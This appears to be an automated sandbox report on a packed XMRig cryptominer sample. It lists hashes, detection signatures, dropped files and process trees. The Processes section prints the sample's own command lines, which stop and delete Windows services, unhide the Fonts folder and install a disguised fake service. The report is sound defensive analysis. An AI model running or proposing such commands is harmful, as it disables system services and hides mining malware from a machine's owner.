Malware Analysis Report

2025-04-19 16:06

Sample ID 240522-sewyysfc75
Target 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118
SHA256 ec4438d1b316a2d106e5070cc7881f9f9d9bcfaf51614bf1c768cc374bdc4ae2
Tags
upx xmrig evasion execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ec4438d1b316a2d106e5070cc7881f9f9d9bcfaf51614bf1c768cc374bdc4ae2

Threat Level: Known bad

The file 67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx xmrig evasion execution miner

xmrig

Disables service(s)

XMRig Miner payload

Stops running service(s)

Deletes itself

Checks computer location settings

Executes dropped EXE

UPX packed file

Loads dropped DLL

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Views/modifies file attributes

Runs net.exe

Kills process with taskkill

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 15:02

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 15:02

Reported

2024-05-22 15:05

Platform

win7-20240419-en

Max time kernel

44s

Max time network

6s

Command Line

"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"

Signatures

Disables service(s)

evasion execution

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Stops running service(s)

evasion execution

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A \??\c:\windows\Fonts\svchost.exe N/A
N/A N/A \??\c:\windows\Fonts\svchost.exe N/A
N/A N/A \??\c:\windows\Fonts\svchost.exe N/A
N/A N/A \??\c:\windows\Fonts\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created \??\c:\windows\Fonts\svchost.exe C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A
File created \??\c:\windows\Fonts\conhost.exe C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A
File opened for modification \??\c:\windows\Fonts\conhost.exe C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A
File opened for modification \??\c:\windows\Fonts\svchost.exe C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Runs net.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1968 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1968 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1968 wrote to memory of 2024 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\cmd.exe
PID 1968 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\net.exe
PID 1968 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 1968 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe C:\Windows\SysWOW64\sc.exe
PID 2024 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2024 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2024 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2024 wrote to memory of 2780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1968 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe
PID 1968 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe \??\c:\windows\Fonts\svchost.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c attrib -s -h -r -a %SystemRoot%\Fonts

C:\Windows\SysWOW64\net.exe

net stop Microsarver

C:\Windows\SysWOW64\sc.exe

sc delete Microsarver

C:\Windows\SysWOW64\net.exe

net stop Samsorver

C:\Windows\SysWOW64\sc.exe

sc delete Samsorver

C:\Windows\SysWOW64\net.exe

net stop lanmanserver /y

C:\Windows\SysWOW64\sc.exe

sc config lanmanserver start= DISABLED 2>nul

C:\Windows\SysWOW64\sc.exe

sc delete lanmanserver

C:\Windows\SysWOW64\net.exe

net stop mssecsvc2.0

C:\Windows\SysWOW64\sc.exe

sc delete mssecsvc2.0

C:\Windows\SysWOW64\net.exe

net stop mssecsvc2.1

C:\Windows\SysWOW64\sc.exe

sc delete mssecsvc2.1

C:\Windows\SysWOW64\attrib.exe

attrib -s -h -r -a C:\Windows\Fonts

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe install Microsarver c:\windows\Fonts\conhost.exe

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Microsarver DisplayName Network Location Service

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe set Microsarver Description Provides performance library information from Windows Management.

\??\c:\windows\Fonts\svchost.exe

c:\windows\Fonts\svchost.exe start Microsarver

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Microsarver

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mssecsvc2.0

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop lanmanserver /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Samsorver

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mssecsvc2.1

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"

Network

N/A

Files

memory/1968-0-0x0000000000400000-0x00000000009C1000-memory.dmp

\Windows\Fonts\svchost.exe

MD5 0a7d7ed55c4202f5106824f11ecb22fa
SHA1 730da74e178d7b114e5d4c0f1dcc956accd4942d
SHA256 5657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595
SHA512 45a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7

memory/1968-21-0x0000000000400000-0x00000000009C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tem.vbs

MD5 f88a489a387ebc7c4c0c6b122ff6aa9b
SHA1 197f045b81fc47892ec4b879f4b55ef1fda8f307
SHA256 8d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a
SHA512 046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 15:02

Reported

2024-05-22 15:05

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe"

Signatures

Disables service(s)

evasion execution

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WScript.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification \??\c:\windows\Fonts\svchost.exe \??\c:\windows\Fonts\conhost.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\Fonts C:\Windows\SysWOW64\attrib.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\67aa4626a523e1eac3b90552be1cd4ad_JaffaCakes118.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
N/A N/A \??\c:\windows\Fonts\conhost.exe N/A
